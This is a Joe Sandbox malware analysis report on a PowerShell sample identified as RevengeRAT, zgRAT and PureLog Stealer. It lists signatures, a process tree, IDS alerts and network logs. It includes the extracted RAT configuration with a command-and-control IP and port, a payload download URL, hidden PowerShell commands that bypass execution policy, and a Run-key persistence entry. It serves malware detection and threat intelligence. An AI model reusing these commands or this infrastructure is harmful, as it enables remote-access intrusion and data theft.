Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
stage2.ps1

Overview

General Information

Sample name:stage2.ps1
Analysis ID:1572999
MD5:86668391bf87240f9b512f7f56e2f4ec
SHA1:b67f1b89d2b5fe4d3121052ad1208211214aa293
SHA256:f666ce7cd0fcb4bf2718c9fb6edcbd825bedae8fd57374931c82a7866975f37d
Tags:ps1user-mossdinger
Infos:

Detection

PureLog Stealer, RevengeRAT, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected PureLog Stealer
Yara detected RevengeRAT
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Creates autostart registry keys with suspicious names
Found RAT behaviour (information extraction to be send to C&C)
Injects a PE file into a foreign processes
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 7548 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\stage2.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • csc.exe (PID: 7820 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
  • cmd.exe (PID: 8120 cmdline: C:\Windows\system32\cmd.exe /c ""C:\ProgramData\PDF\1.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 8128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 8172 cmdline: CMD /C powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 8188 cmdline: powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • csc.exe (PID: 3020 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
  • cmd.exe (PID: 3332 cmdline: C:\Windows\system32\cmd.exe /c ""C:\ProgramData\PDF\1.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2492 cmdline: CMD /C powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 1720 cmdline: powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • csc.exe (PID: 3156 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: RevengeRAT

{"Host": ["102.165.46.145"], "Port": ["333"], "ID": "NyanCatRevenge", "Mutex": "pHXJvbCGPPiC", "Key": "Revenge-RAT", "Splitter": "!@#%^NYAN#!@$"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
stage2.ps1JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

    PCAP (Network Traffic)

    SourceRuleDescriptionAuthorStrings
    dump.pcapJoeSecurity_RevengeRATYara detected RevengeRATJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000002.00000002.4115369632.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RevengeRATYara detected RevengeRATJoe Security
        00000002.00000002.4115369632.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Revengerat_db91bcc6unknownunknown
        • 0x2e08:$a1: Revenge-RAT
        • 0x2f34:$a2: SELECT * FROM FirewallProduct
        • 0x2e6e:$a3: HKEY_CURRENT_USER\SOFTWARE\
        • 0x23d6:$a4: get_MachineName
        0000000F.00000002.2076815296.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RevengeRATYara detected RevengeRATJoe Security
          0000000F.00000002.2076815296.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Revengerat_db91bcc6unknownunknown
          • 0x2e08:$a1: Revenge-RAT
          • 0x2f34:$a2: SELECT * FROM FirewallProduct
          • 0x2e6e:$a3: HKEY_CURRENT_USER\SOFTWARE\
          • 0x23d6:$a4: get_MachineName
          00000000.00000002.1897758677.000001C2CE4E0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            Click to see the 15 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.csc.exe.400000.0.unpackJoeSecurity_RevengeRATYara detected RevengeRATJoe Security
              15.2.csc.exe.400000.0.unpackJoeSecurity_RevengeRATYara detected RevengeRATJoe Security
                10.2.csc.exe.400000.0.unpackJoeSecurity_RevengeRATYara detected RevengeRATJoe Security
                  2.2.csc.exe.400000.0.unpackWindows_Trojan_Revengerat_db91bcc6unknownunknown
                  • 0x3008:$a1: Revenge-RAT
                  • 0x3134:$a2: SELECT * FROM FirewallProduct
                  • 0x306e:$a3: HKEY_CURRENT_USER\SOFTWARE\
                  • 0x25d6:$a4: get_MachineName
                  15.2.csc.exe.400000.0.unpackWindows_Trojan_Revengerat_db91bcc6unknownunknown
                  • 0x3008:$a1: Revenge-RAT
                  • 0x3134:$a2: SELECT * FROM FirewallProduct
                  • 0x306e:$a3: HKEY_CURRENT_USER\SOFTWARE\
                  • 0x25d6:$a4: get_MachineName
                  Click to see the 22 entries

                  Other

                  SourceRuleDescriptionAuthorStrings
                  amsi64_7548.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powerup Write Hijack DLL
                    Source: File createdAuthor: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7548, TargetFilename: C:\ProgramData\PDF\1.bat
                    Sigma detected: Suspicious PowerShell Parameter Substring
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1", CommandLine: powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: CMD /C powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8172, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1", ProcessId: 8188, ProcessName: powershell.exe
                    Sigma detected: Change PowerShell Policies to an Insecure Level
                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\stage2.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\stage2.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\stage2.ps1", ProcessId: 7548, ProcessName: powershell.exe
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\PDF\1.bat, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7548, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\D
                    Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                    Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7548, TargetFilename: C:\ProgramData\PDF\1.bat
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\stage2.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\stage2.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\stage2.ps1", ProcessId: 7548, ProcessName: powershell.exe
                    Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7548, TargetFilename: C:\ProgramData\PDF\PDF2.ps1

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-11T11:25:47.326095+010020358851Malware Command and Control Activity Detected192.168.2.449733102.165.46.145333TCP
                    2024-12-11T11:26:17.341478+010020358851Malware Command and Control Activity Detected192.168.2.449733102.165.46.145333TCP
                    2024-12-11T11:26:47.356218+010020358851Malware Command and Control Activity Detected192.168.2.449733102.165.46.145333TCP
                    2024-12-11T11:26:50.966752+010020358851Malware Command and Control Activity Detected192.168.2.449733102.165.46.145333TCP
                    2024-12-11T11:27:00.231888+010020358851Malware Command and Control Activity Detected192.168.2.449733102.165.46.145333TCP
                    2024-12-11T11:27:00.351303+010020358851Malware Command and Control Activity Detected192.168.2.449733102.165.46.145333TCP
                    2024-12-11T11:27:16.419352+010020358851Malware Command and Control Activity Detected192.168.2.449733102.165.46.145333TCP
                    2024-12-11T11:27:24.841118+010020358851Malware Command and Control Activity Detected192.168.2.449733102.165.46.145333TCP
                    2024-12-11T11:28:04.185052+010020358851Malware Command and Control Activity Detected192.168.2.449733102.165.46.145333TCP
                    2024-12-11T11:28:32.106992+010020358851Malware Command and Control Activity Detected192.168.2.449733102.165.46.145333TCP
                    2024-12-11T11:28:34.028762+010020358851Malware Command and Control Activity Detected192.168.2.449733102.165.46.145333TCP
                    2024-12-11T11:28:47.685524+010020358851Malware Command and Control Activity Detected192.168.2.449733102.165.46.145333TCP
                    2024-12-11T11:28:50.653807+010020358851Malware Command and Control Activity Detected192.168.2.449733102.165.46.145333TCP
                    2024-12-11T11:29:04.202633+010020358851Malware Command and Control Activity Detected192.168.2.449733102.165.46.145333TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-11T11:25:17.321307+010028411131Malware Command and Control Activity Detected192.168.2.449733102.165.46.145333TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 2.2.csc.exe.400000.0.unpackMalware Configuration Extractor: RevengeRAT {"Host": ["102.165.46.145"], "Port": ["333"], "ID": "NyanCatRevenge", "Mutex": "pHXJvbCGPPiC", "Key": "Revenge-RAT", "Splitter": "!@#%^NYAN#!@$"}
                    Multi AV Scanner detection for submitted file
                    Source: stage2.ps1Virustotal: Detection: 12%Perma Link
                    Yara detected RevengeRAT
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 2.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.powershell.exe.1c2b7b97990.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.powershell.exe.1c2b7b97990.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.4115369632.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2076815296.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4116375776.0000000007242000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2001377795.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4116375776.00000000071E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1860455437.000001C2B7B84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: csc.exe PID: 7820, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: csc.exe PID: 3020, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: csc.exe PID: 3156, type: MEMORYSTR
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                    Source: unknownHTTPS traffic detected: 151.101.193.137:443 -> 192.168.2.4:49730 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 151.101.1.137:443 -> 192.168.2.4:49738 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 151.101.1.137:443 -> 192.168.2.4:49739 version: TLS 1.2
                    Source: Binary string: C:\Users\pc\Desktop\RevengeRAT C# Stub\Lime\obj\Debug\Lime.pdb source: powershell.exe, 00000000.00000002.1860455437.000001C2B7B84000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4115369632.0000000000402000.00000040.00000400.00020000.00000000.sdmp, csc.exe, 0000000A.00000002.2001377795.0000000000402000.00000040.00000400.00020000.00000000.sdmp, csc.exe, 0000000F.00000002.2076815296.0000000000402000.00000040.00000400.00020000.00000000.sdmp
                    Source: Binary string: ClassLibrary1.pdb source: powershell.exe, 00000000.00000002.1897758677.000001C2CE4E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.1883635223.000001C2C68BC000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: ClassLibrary1.pdb8 source: powershell.exe, 00000000.00000002.1897758677.000001C2CE4E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.1883635223.000001C2C68BC000.00000004.00000800.00020000.00000000.sdmp
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4x nop then jmp 05762730h2_2_05762639
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4x nop then mov ecx, dword ptr [ebp-3Ch]2_2_05762BF0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4x nop then jmp 0576A7A1h2_2_05769A60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4x nop then mov ecx, dword ptr [ebp-3Ch]2_2_05762BE8

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2841113 - Severity 1 - ETPRO MALWARE MSIL/Revenge-RAT CnC Checkin M4 : 192.168.2.4:49733 -> 102.165.46.145:333
                    Source: Network trafficSuricata IDS: 2035885 - Severity 1 - ET MALWARE MSIL/Revenge-RAT Keep-Alive Activity (Outbound) M2 : 192.168.2.4:49733 -> 102.165.46.145:333
                    Source: global trafficTCP traffic: 192.168.2.4:49733 -> 102.165.46.145:333
                    Source: global trafficHTTP traffic detected: GET /dxtifaxks/raw/upload/v1733864777/asyn_s8bwjo.txt HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /dxtifaxks/raw/upload/v1733864777/asyn_s8bwjo.txt HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /dxtifaxks/raw/upload/v1733864777/asyn_s8bwjo.txt HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 151.101.1.137 151.101.1.137
                    Source: Joe Sandbox ViewASN Name: RAINBOW-HKRainbownetworklimitedHK RAINBOW-HKRainbownetworklimitedHK
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownTCP traffic detected without corresponding DNS query: 102.165.46.145
                    Source: unknownTCP traffic detected without corresponding DNS query: 102.165.46.145
                    Source: unknownTCP traffic detected without corresponding DNS query: 102.165.46.145
                    Source: unknownTCP traffic detected without corresponding DNS query: 102.165.46.145
                    Source: unknownTCP traffic detected without corresponding DNS query: 102.165.46.145
                    Source: unknownTCP traffic detected without corresponding DNS query: 102.165.46.145
                    Source: unknownTCP traffic detected without corresponding DNS query: 102.165.46.145
                    Source: unknownTCP traffic detected without corresponding DNS query: 102.165.46.145
                    Source: unknownTCP traffic detected without corresponding DNS query: 102.165.46.145
                    Source: unknownTCP traffic detected without corresponding DNS query: 102.165.46.145
                    Source: unknownTCP traffic detected without corresponding DNS query: 102.165.46.145
                    Source: unknownTCP traffic detected without corresponding DNS query: 102.165.46.145
                    Source: unknownTCP traffic detected without corresponding DNS query: 102.165.46.145
                    Source: unknownTCP traffic detected without corresponding DNS query: 102.165.46.145
                    Source: unknownTCP traffic detected without corresponding DNS query: 102.165.46.145
                    Source: unknownTCP traffic detected without corresponding DNS query: 102.165.46.145
                    Source: unknownTCP traffic detected without corresponding DNS query: 102.165.46.145
                    Source: unknownTCP traffic detected without corresponding DNS query: 102.165.46.145
                    Source: unknownTCP traffic detected without corresponding DNS query: 102.165.46.145
                    Source: unknownTCP traffic detected without corresponding DNS query: 102.165.46.145
                    Source: unknownTCP traffic detected without corresponding DNS query: 102.165.46.145
                    Source: unknownTCP traffic detected without corresponding DNS query: 102.165.46.145
                    Source: unknownTCP traffic detected without corresponding DNS query: 102.165.46.145
                    Source: unknownTCP traffic detected without corresponding DNS query: 102.165.46.145
                    Source: unknownTCP traffic detected without corresponding DNS query: 102.165.46.145
                    Source: unknownTCP traffic detected without corresponding DNS query: 102.165.46.145
                    Source: unknownTCP traffic detected without corresponding DNS query: 102.165.46.145
                    Source: unknownTCP traffic detected without corresponding DNS query: 102.165.46.145
                    Source: unknownTCP traffic detected without corresponding DNS query: 102.165.46.145
                    Source: unknownTCP traffic detected without corresponding DNS query: 102.165.46.145
                    Source: unknownTCP traffic detected without corresponding DNS query: 102.165.46.145
                    Source: unknownTCP traffic detected without corresponding DNS query: 102.165.46.145
                    Source: unknownTCP traffic detected without corresponding DNS query: 102.165.46.145
                    Source: unknownTCP traffic detected without corresponding DNS query: 102.165.46.145
                    Source: unknownTCP traffic detected without corresponding DNS query: 102.165.46.145
                    Source: unknownTCP traffic detected without corresponding DNS query: 102.165.46.145
                    Source: unknownTCP traffic detected without corresponding DNS query: 102.165.46.145
                    Source: unknownTCP traffic detected without corresponding DNS query: 102.165.46.145
                    Source: unknownTCP traffic detected without corresponding DNS query: 102.165.46.145
                    Source: unknownTCP traffic detected without corresponding DNS query: 102.165.46.145
                    Source: unknownTCP traffic detected without corresponding DNS query: 102.165.46.145
                    Source: unknownTCP traffic detected without corresponding DNS query: 102.165.46.145
                    Source: unknownTCP traffic detected without corresponding DNS query: 102.165.46.145
                    Source: unknownTCP traffic detected without corresponding DNS query: 102.165.46.145
                    Source: unknownTCP traffic detected without corresponding DNS query: 102.165.46.145
                    Source: unknownTCP traffic detected without corresponding DNS query: 102.165.46.145
                    Source: unknownTCP traffic detected without corresponding DNS query: 102.165.46.145
                    Source: unknownTCP traffic detected without corresponding DNS query: 102.165.46.145
                    Source: unknownTCP traffic detected without corresponding DNS query: 102.165.46.145
                    Source: unknownTCP traffic detected without corresponding DNS query: 102.165.46.145
                    Source: global trafficHTTP traffic detected: GET /dxtifaxks/raw/upload/v1733864777/asyn_s8bwjo.txt HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /dxtifaxks/raw/upload/v1733864777/asyn_s8bwjo.txt HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /dxtifaxks/raw/upload/v1733864777/asyn_s8bwjo.txt HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: res.cloudinary.com
                    Source: powershell.exe, 00000000.00000002.1860455437.000001C2B7B48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cloudinary.map.fastly.net
                    Source: powershell.exe, 00000000.00000002.1883635223.000001C2C62BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1860455437.000001C2B60D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000000.00000002.1860455437.000001C2B6267000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000000.00000002.1860455437.000001C2B7B48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://res.cloudinary.com
                    Source: powershell.exe, 00000000.00000002.1860455437.000001C2B5EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000000.00000002.1860455437.000001C2B6267000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 00000000.00000002.1860455437.000001C2B5EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: powershell.exe, 00000000.00000002.1860455437.000001C2B60D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000000.00000002.1860455437.000001C2B60D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000000.00000002.1860455437.000001C2B60D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000000.00000002.1860455437.000001C2B6267000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000000.00000002.1860455437.000001C2B6C67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                    Source: powershell.exe, 00000000.00000002.1883635223.000001C2C62BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1860455437.000001C2B60D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: powershell.exe, 00000000.00000002.1860455437.000001C2B7B42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1860455437.000001C2B7A14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com
                    Source: powershell.exe, 00000000.00000002.1860455437.000001C2B793B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dxtifaxks/raw/upload/v1733864777/asyn
                    Source: powershell.exe, 00000000.00000002.1860455437.000001C2B6C67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1860455437.000001C2B7667000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1883635223.000001C2C62BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1860455437.000001C2B7A14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1860455437.000001C2B793B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1883635223.000001C2C66EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1883635223.000001C2C60EE000.00000004.00000800.00020000.00000000.sdmp, stage2.ps1, PDF2.ps1.0.drString found in binary or memory: https://res.cloudinary.com/dxtifaxks/raw/upload/v1733864777/asyn_s8bwjo.txt
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                    Source: unknownHTTPS traffic detected: 151.101.193.137:443 -> 192.168.2.4:49730 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 151.101.1.137:443 -> 192.168.2.4:49738 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 151.101.1.137:443 -> 192.168.2.4:49739 version: TLS 1.2

                    E-Banking Fraud

                    barindex
                    Yara detected RevengeRAT
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 2.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.powershell.exe.1c2b7b97990.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.powershell.exe.1c2b7b97990.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.4115369632.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
